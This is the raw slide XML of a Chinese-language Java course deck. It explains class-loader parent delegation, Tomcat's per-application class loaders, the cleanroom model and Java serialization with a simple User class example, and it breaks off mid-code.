              <a:t>加载过程示例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求加载类：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>假设你的应用程序中有一段代码需要使用 com.example.MyArrayList 类。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>类加载器的层次结构：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用类加载器（AppClassLoader）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扩展类加载器（ExtClassLoader）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>启动类加载器（Bootstrap ClassLoader）</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-Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>进阶</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270510" y="1195070"/>
            <a:ext cx="11306175" cy="5120005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>委派机制：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用类加载器首先会查看其父类加载器（即扩展类加载器）是否已经加载了 com.example.MyArrayList。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果没有，扩展类加载器会继续查找其父类加载器（即启动类加载器），看看是否加载了该类。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>核心类的优先加载：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>启动类加载器会检查 java.lang.Object 和其他核心类。如果在这些核心类中找到名称相同的类（比如 java.util.ArrayList），则会优先加载核心类。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>此时，扩展类加载器和应用类加载器都无法加载与核心类同名的类。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最终加载：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果 com.example.MyArrayList 不在任何父类加载器中找到，应用类加载器才会尝试自己去加载这个类。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>双亲委派的核心思想：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>向上询问，向下加载。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>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其他软件开发方法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998855" y="2061210"/>
            <a:ext cx="4667250" cy="216852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净室模型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>净室是一种应用数学与统计学理论以经济的方式生产高质量软件的工程技术。力图通过严格的工程化的软件过程达到开发中的零缺陷或接近零缺陷。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5832475" y="1764665"/>
            <a:ext cx="5513070" cy="3560445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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-Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>进阶</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270510" y="1195070"/>
            <a:ext cx="7952105" cy="5283835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用了自定义加载器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(WebappClassLoader)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>打破了双亲委派</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模型；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>假设有两个 Web 应用，分别依赖于不同版本的 commons-logging 库：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用 A 依赖于 commons-logging-1.0.jar</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用 B 依赖于 commons-logging-1.2.jar</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在严格的双亲委派模型下，可能会导致加载错误的版本。但由于 Tomcat 为每个 Web 应用创建了独立的类加载器，应用 A 和应用 B 可以各自加载自己的版本，而不会互相干扰。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>做到了应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>隔离：每个应用可以使用不同版本的类库，而不必担心其他应用的影响。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>打破父子关系：当应用请求加载类时，WebappClassLoader 会首先尝试加载自己负责的类，如果没有找到再向父加载器寻求帮助，而不是严格遵循父加载器优先的原则。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主张</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>谁的孩子谁抱走</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>原则</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="图片1 (2)"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8426450" y="1094105"/>
            <a:ext cx="2364105" cy="5279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反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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452755" y="1282065"/>
            <a:ext cx="11268075" cy="1494790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为什么需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>序列化？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在当今的网络社会，我们需要在网络上传输各种类型的数据，包括文本、图片、音频、视频等， 而这些数据都是以二进制序列的形式在网络上传送的，那么发送方就需要将这些数据序列化为字节流后传输，而接收方接到字节流后需要反序列化为相应的数据类型。当然接收方也可以将接收到的字节流存储到磁盘中，等到以后想恢复的时候再恢复。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425450" y="2776855"/>
            <a:ext cx="11355070" cy="3536950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>序列化：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:t>把对象转换为字节序列的过程称为对象的序列化。</a:t>
            </a:r>
          </a:p>
          <a:p/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>序列化的本质是什么？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将复杂数据结构转化为易于存储和传输的形式的技术，对于现代软件开发中的数据管理、网络通信和系统集成起着至关重要的作用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6334125" y="4373245"/>
            <a:ext cx="5172075" cy="19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反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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309880" y="1282065"/>
            <a:ext cx="11268075" cy="1494790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193040" y="1194435"/>
            <a:ext cx="11623675" cy="5039995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
              <a:t>中的序列化与反序列化：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>Java序列化是通过对象输入输出流(ObjectInputStream和ObjectOutputStream)实现的。序列化时需要实现Serializable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> Externalizable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>接口,然后使用ObjectOutputStream输出对象,反序列化时使用ObjectInputStream从流中恢复对象。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
              <a:t>中实现序列化的方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>方式一：实现 Serializable 接口序列化</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>这种方式最为常用且常见，只需要对需要序列化的类实现 Serializable 即可，对于不希望进行序列化的，可以使用 transient 关键词进行修饰（即瞬时变量）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>这种方式序列化的特征：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>1、 Serializable 接口仅仅是一个标记接口，不包含任何方法；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>2、对于Serializable对象来说，对象完全以它存储的二进制位为基础来构造，（反序列化）不会调用构造器。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>方式二：实现 Externalizable 接口序列化</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>这种方式可以实现序列化的完全自定义：所有成员变量是否序列化都需要在 writeExternal()、readExternal()方法中写出；且可以完全自定义序列化方式（在 writerExternal()、readExternal()方法中）。当然，实现 Externalizable 接口必须要重写这两个方法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>这种方式序列化的特征：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>1、必须重写 writerExternal()、readExternal()两个方法，并在两个方法中写出所有需要序列化的成员变量；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>2、对于 Externalizable对象来说，必须要有无参public构造器，不然会报出 InvalidClassException 异常。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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241300" y="1252855"/>
            <a:ext cx="11544935" cy="4961890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>例子：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>class User implements Serializable{</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    private String name;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    private transient int age;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这里使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>transient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>关键字，也就是标记之后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>age</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不会序列化。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    private float height;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    public User(String name, int age, float height) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        this.name = name;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        this.age = age;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        this.height = height;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    public void info(){</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        System.out.println("Name: "+name+", Age: "+age+", Height: "+height);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>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反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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305" y="1165225"/>
            <a:ext cx="11645265" cy="5088255"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>  public static void main(String[] args){</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
